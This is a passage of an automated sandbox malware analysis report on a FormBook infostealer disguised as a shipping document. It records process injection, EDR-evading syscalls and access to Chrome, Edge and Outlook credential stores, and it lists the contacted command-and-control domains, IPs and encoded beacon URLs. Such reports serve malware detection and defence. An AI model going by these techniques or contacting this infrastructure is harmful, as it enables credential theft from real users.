            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Final Shipping Document.exe, QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC0698 cpuid 0_2_00BC0698
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C18195
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BFD27A GetUserNameW,0_2_00BFD27A
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BDB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00BDB952
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BA42DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Final Shipping Document.exeBinary or memory string: WIN_81
            Source: Final Shipping Document.exeBinary or memory string: WIN_XP
            Source: Final Shipping Document.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Final Shipping Document.exeBinary or memory string: WIN_XPe
            Source: Final Shipping Document.exeBinary or memory string: WIN_VISTA
            Source: Final Shipping Document.exeBinary or memory string: WIN_7
            Source: Final Shipping Document.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00C21204
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C21806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483158 Sample: Final Shipping Document.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 28 www.pqnqxn.xyz 2->28 30 www.gridban.xyz 2->30 32 15 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 7 other signatures 2->50 10 Final Shipping Document.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 QnAcfZuONg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 gpupdate.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 QnAcfZuONg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.gridban.xyz 162.254.38.56, 55163, 55164, 55165 COGECO-PEER1CA United States 22->34 36 www.pqnqxn.xyz 104.21.59.240, 55143, 55144, 55145 CLOUDFLARENETUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Final Shipping Document.exe63%ReversingLabsWin32.Trojan.Strab
            Final Shipping Document.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.gridban.xyz/hheq/0%Avira URL Cloudsafe
            http://www.artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP00%Avira URL Cloudsafe
            http://www.xawcfzcql9tcvj.shop/jug9/0%Avira URL Cloudsafe
            http://www.toppersbusiness.net/hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA==0%Avira URL Cloudsafe
            http://www.xawcfzcql9tcvj.shop0%Avira URL Cloudsafe
            http://www.rajveena.online/wptv/0%Avira URL Cloudsafe
            http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA==100%Avira URL Cloudmalware
            http://www.pqnqxn.xyz/fku9/0%Avira URL Cloudsafe
            http://www.lovezi.shop/htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw==0%Avira URL Cloudsafe
            http://www.gridban.xyz/hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP00%Avira URL Cloudsafe
            http://www.artfulfusionhub.lat/qogc/0%Avira URL Cloudsafe
            http://www.lovezi.shop/htli/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH0%Avira URL Cloudsafe
            https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD100%Avira URL Cloudmalware
            http://www.suntextmeetings.online/1wd4/0%Avira URL Cloudsafe
            http://www.pqnqxn.xyz/fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP00%Avira URL Cloudsafe
            http://www.rajveena.online/wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP00%Avira URL Cloudsafe
            http://www.pqnqxn.xyz0%Avira URL Cloudsafe
            http://www.suntextmeetings.online/1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP00%Avira URL Cloudsafe
            http://www.9muyiutyt.online/39t8/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            suntextmeetings.online
            		148.66.138.133
            		truefalse
              		unknown
              www.pqnqxn.xyz
              		104.21.59.240
              		truetrue
                		unknown
                www.artfulfusionhub.lat
                		188.114.96.3
                		truefalse
                  		unknown
                  8fyhback.javalebogame008.com
                  		154.218.3.243
                  		truefalse
                    		unknown
                    toppersbusiness.net
                    		178.212.35.248
                    		truefalse
                      		unknown
                      www.gridban.xyz
                      		162.254.38.56
                      		truetrue
                        		unknown
                        rajveena.online
                        		84.32.84.32
                        		truefalse
                          		unknown
                          lovezi.shop
                          		84.32.84.32
                          		truefalse
                            		unknown
                            xawcfzcql9tcvj.shop
                            		142.171.29.133
                            		truefalse
                              		unknown
                              www.76716e97778bac2e.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.rajveena.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.9muyiutyt.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.toppersbusiness.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.suntextmeetings.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.lovezi.shop
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.xawcfzcql9tcvj.shop
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.gridban.xyz/hheq/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA==false
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.xawcfzcql9tcvj.shop/jug9/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.toppersbusiness.net/hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA==false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gridban.xyz/hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rajveena.online/wptv/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lovezi.shop/htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw==false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.artfulfusionhub.lat/qogc/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.pqnqxn.xyz/fku9/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.suntextmeetings.online/1wd4/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lovezi.shop/htli/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rajveena.online/wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.9muyiutyt.online/39t8/false
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.suntextmeetings.online/1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.pqnqxn.xyz/fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0false
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.xawcfzcql9tcvj.shopQnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/chrome_newtabgpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icogpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVDgpupdate.exe, 00000005.00000002.3891568008.0000000006210000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003E70000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJHgpupdate.exe, 00000005.00000002.3891568008.000000000607E000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003CDE000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssgpupdate.exe, 00000005.00000002.3891568008.0000000006534000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000004194000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.pqnqxn.xyzgpupdate.exe, 00000005.00000002.3891568008.0000000005D5A000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.00000000039BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            178.212.35.248
                                            		toppersbusiness.netGermany
                                            		35913DEDIPATH-LLCUSfalse
                                            104.21.59.240
                                            		www.pqnqxn.xyzUnited States
                                            		13335CLOUDFLARENETUStrue
                                            188.114.96.3
                                            		www.artfulfusionhub.latEuropean Union
                                            		13335CLOUDFLARENETUSfalse
                                            84.32.84.32
                                            		rajveena.onlineLithuania
                                            		33922NTT-LT-ASLTfalse
                                            154.218.3.243
                                            		8fyhback.javalebogame008.comSeychelles
                                            		138995BILLY-AS-APAntboxNetworkCNfalse
                                            142.171.29.133
                                            		xawcfzcql9tcvj.shopCanada
                                            		7122MTS-ASNCAfalse
                                            162.254.38.56
                                            		www.gridban.xyzUnited States
                                            		13768COGECO-PEER1CAtrue
                                            148.66.138.133
                                            		suntextmeetings.onlineSingapore
                                            		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1483158
                                            Start date and time:2024-07-26 18:44:03 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 24s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:7
